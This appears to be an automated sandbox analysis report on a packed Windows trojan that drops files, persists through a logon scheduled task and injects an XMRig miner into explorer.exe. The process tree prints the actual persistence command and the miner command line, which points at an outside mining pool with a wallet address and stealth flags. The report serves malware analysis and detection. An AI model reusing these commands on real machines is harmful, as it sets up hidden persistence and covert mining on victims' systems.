Analysis
- max time kernel: 132s
- max time network: 129s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 16-07-2021 16:01
- Static task: static1
- Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
- Resource: win7v20210410
General
- Target: SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
- Size: 2.1MB
- MD5: 73ab4524d40fd3f991dd0b12646772e1
- SHA1: f1391279800f539282edaf04f636642d6569a7d8
- SHA256: d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
- SHA512: 4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
Malware Config
Signatures
- XMRig Miner Payload (3 IoCs)
  Processes:
    resource | yara_rule
    behavioral1/memory/1988-92-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
    behavioral1/memory/1988-93-0x00000001402EB66C-mapping.dmp | xmrig
    behavioral1/memory/1988-95-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
- Executes dropped EXE (3 IoCs)
  Processes:
    pid | process
    396 | sihost64.exe
    1128 | Services64System.exe
    1572 | sihost64.exe
- Loads dropped DLL (3 IoCs)
  Processes:
    pid | process
    768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
    768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
    1128 | Services64System.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Suspicious use of SetThreadContext (1 IoCs)
  Processes:
    description | pid | process | target process
    PID 1128 set thread context of 1988 | 1128 | Services64System.exe | explorer.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid | process
    768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
    768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
    1128 | Services64System.exe
    1128 | Services64System.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
    Token: SeDebugPrivilege | 1128 | Services64System.exe
    Token: SeLockMemoryPrivilege | 1988 | explorer.exe
    Token: SeLockMemoryPrivilege | 1988 | explorer.exe
- Suspicious use of WriteProcessMemory (37 IoCs)
  Processes (identical entries grouped, with the number of repeated entries in the last column):
    description | pid | process | target process | entries
    PID 768 wrote to memory of 1368 | 768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe | cmd.exe | 3
    PID 1368 wrote to memory of 832 | 1368 | cmd.exe | schtasks.exe | 3
    PID 768 wrote to memory of 396 | 768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe | sihost64.exe | 3
    PID 768 wrote to memory of 1128 | 768 | SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe | Services64System.exe | 3
    PID 1128 wrote to memory of 1220 | 1128 | Services64System.exe | cmd.exe | 3
    PID 1220 wrote to memory of 1652 | 1220 | cmd.exe | schtasks.exe | 3
    PID 1128 wrote to memory of 1572 | 1128 | Services64System.exe | sihost64.exe | 3
    PID 1128 wrote to memory of 1988 | 1128 | Services64System.exe | explorer.exe | 16
Processes (tree; indentation shows parent/child depth)
- [1] C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe"
  Signatures:
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit
    Signatures:
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\schtasks.exe
      Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'
      Signatures:
      - Creates scheduled task(s)
  - [2] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    Signatures:
    - Executes dropped EXE
  - [2] C:\Users\Admin\AppData\Roaming\Services64System.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Services64System.exe"
    Signatures:
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit
      Signatures:
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'
        Signatures:
        - Creates scheduled task(s)
    - [3] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      Signatures:
      - Executes dropped EXE
    - [3] C:\Windows\explorer.exe
      Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.minexmr.com:4444 --user=45xUdHPiFHQ7xbKh19G45saF1raB2ot5pag8p1Hnk4yrfXRJZskr8TMbFpVfC5tDk8eQQg63TqkW9gKhwagx6HePTaK2yXb --pass= --cpu-max-threads-hint=0 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=100 --cinit-stealth
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
  MD5: 0c0195c48b6b8582fa6f6373032118da
  SHA1: d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256: 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512: ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: e5e9669aa667d6e2b8298fe086ec0026
  SHA1: 133e5cd7196fb848ed4139573c2b62b3cb243814
  SHA256: 82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
  SHA512: 86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
- C:\Users\Admin\AppData\Roaming\Services64System.exe
  MD5: 73ab4524d40fd3f991dd0b12646772e1
  SHA1: f1391279800f539282edaf04f636642d6569a7d8
  SHA256: d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
  SHA512: 4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
- \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: e5e9669aa667d6e2b8298fe086ec0026
  SHA1: 133e5cd7196fb848ed4139573c2b62b3cb243814
  SHA256: 82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
  SHA512: 86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
- \Users\Admin\AppData\Roaming\Services64System.exe
  MD5: 73ab4524d40fd3f991dd0b12646772e1
  SHA1: f1391279800f539282edaf04f636642d6569a7d8
  SHA256: d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
  SHA512: 4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
Memory dumps (Filesize given where the report records one; mapping dumps have no size)
- memory/396-78-0x0000000000650000-0x0000000000652000-memory.dmp (Filesize: 8KB)
- memory/396-74-0x000000013FF00000-0x000000013FF01000-memory.dmp (Filesize: 4KB)
- memory/396-67-0x0000000000000000-mapping.dmp
- memory/396-80-0x000000001ADC0000-0x000000001ADC2000-memory.dmp (Filesize: 8KB)
- memory/768-60-0x000000013F500000-0x000000013F501000-memory.dmp (Filesize: 4KB)
- memory/768-63-0x000000001BA90000-0x000000001BA92000-memory.dmp (Filesize: 8KB)
- memory/768-62-0x000000001C2D0000-0x000000001C4EC000-memory.dmp (Filesize: 2.1MB)
- memory/832-65-0x0000000000000000-mapping.dmp
- memory/1128-75-0x000000013F920000-0x000000013F921000-memory.dmp (Filesize: 4KB)
- memory/1128-71-0x0000000000000000-mapping.dmp
- memory/1128-81-0x000000001AC20000-0x000000001AC22000-memory.dmp (Filesize: 8KB)
- memory/1128-91-0x0000000002410000-0x000000000241A000-memory.dmp (Filesize: 40KB)
- memory/1220-82-0x0000000000000000-mapping.dmp
- memory/1368-64-0x0000000000000000-mapping.dmp
- memory/1572-89-0x000000013F5F0000-0x000000013F5F1000-memory.dmp (Filesize: 4KB)
- memory/1572-85-0x0000000000000000-mapping.dmp
- memory/1572-101-0x000000001BA50000-0x000000001BA52000-memory.dmp (Filesize: 8KB)
- memory/1652-83-0x0000000000000000-mapping.dmp
- memory/1988-94-0x00000000000E0000-0x0000000000100000-memory.dmp (Filesize: 128KB)
- memory/1988-93-0x00000001402EB66C-mapping.dmp
- memory/1988-95-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
- memory/1988-96-0x00000000001D0000-0x00000000001F0000-memory.dmp (Filesize: 128KB)
- memory/1988-97-0x00000000001F0000-0x0000000000210000-memory.dmp (Filesize: 128KB)
- memory/1988-98-0x00000000001D0000-0x00000000001F0000-memory.dmp (Filesize: 128KB)
- memory/1988-99-0x00000000001F0000-0x0000000000210000-memory.dmp (Filesize: 128KB)
- memory/1988-92-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)